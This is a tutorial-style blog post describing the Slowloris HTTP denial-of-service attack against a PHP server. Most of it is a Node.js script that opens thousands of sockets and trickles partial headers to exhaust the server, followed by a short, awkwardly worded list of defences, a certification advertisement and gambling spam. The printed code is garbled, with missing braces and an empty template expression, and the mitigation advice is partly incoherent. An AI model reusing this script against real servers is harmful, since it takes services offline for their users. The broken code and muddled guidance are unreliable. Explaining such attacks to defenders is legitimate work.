Author - StudySection Post Views - 283 views

How Slow Loris attack using JavaScript on a PHP Server and prevent

SlowLoris is actually an HTTP denial of service attack that affects threaded servers. Here’s how it works:

  • We start making a lot of HTTP requests.
  • We send data from time to time (every 15 seconds) to keep connections open.
  • We never close the connection until the server goes down. If the server closes the connection, we continue to create a new one.

PHP Server

const net = require('net')
const opts = {
host: 'localhost',
port: 1234,
sockets: 2000,
respawn: false,
rate: 600,
method: 'GET',
path: '/'
let activeSockets = 0
console.log('Starting sockets...')
const addSocket = () => {
let socket = new net.Socket()
socket.on('connect', () => {
socket.write(`${opts.method} ${opts.path} HTTP/1.1\n`, 'ascii', () => {
console.log('Socket activated. (Total active: ' + activeSockets + ')')
socket.write(`Host: ${}\n`)
let sentPacketCount = 0
const intv = setInterval(() => {
if(!socket) clearInterval(intv)
else {
socket.write(`x-header-${sentPacketCount}: ${sentPacketCount}\n`)
}, opts.rate)
socket.on('error', err => {
console.log('Socket error - ' + err.message)
socket.on('data', (data) => {
console.log('Socket data - ' + data.toString())
socket.on('close', () => {
socket = false
if (opts.respawn) {
console.log('Respawning dead socket...')
socket.on('error', err => {
console.log(`Server down.`)
for (let i=0;i<opts.sockets; i++) {


After a few minutes, you will see that the PHP server goes down. This is because there are too many connections and the PHP server can’t handle them due to other open connections and memory issues.

Why are Slow Loris Attack Dangerous

Slow Loris sends incomplete packages, instead of losing them, traditional login search systems do not work well in detecting this type of DDoS attack. Slow Loris DDoS attacks can continue for a long time if they are not detected. Even if the sockets run out, Slow Loris will try to restore the connection until it reaches its goal of shutting down the server completely.

How to Protect Against a Slow Loris attack

  1. Define minimum incoming data rates, and drop connections that are slower than that rate. At the very least be careful not to set too little, or you risk leaving a legitimate connection.
  2. Reject / drop connections with HTTP (actions) are not supported by URLs.
  3. An IP address is allowed to try.
  4. A connection is allowed. Minimum transfer speed and location limit.
  5. Restrict as long as the customer is allowed to stay connected.
  6. Use a service that acts as a reverse proxy, protecting the default server.

StudySection has a long list of certification exams that it offers through its online platform. The PHP Certification Exam is one of the programming certifications that it provides. Whether you are new to PHP programming or you have extensive experience in PHP programming, you can get a certification according to your level. Attach a PHP certification with your resume to get the most out of job offers.

Leave a Reply

Your email address will not be published. Required fields are marked * cratosroyalbet betwoon grandpashabet grandpashabet giriş deneme bonusu veren siteler casino siteleri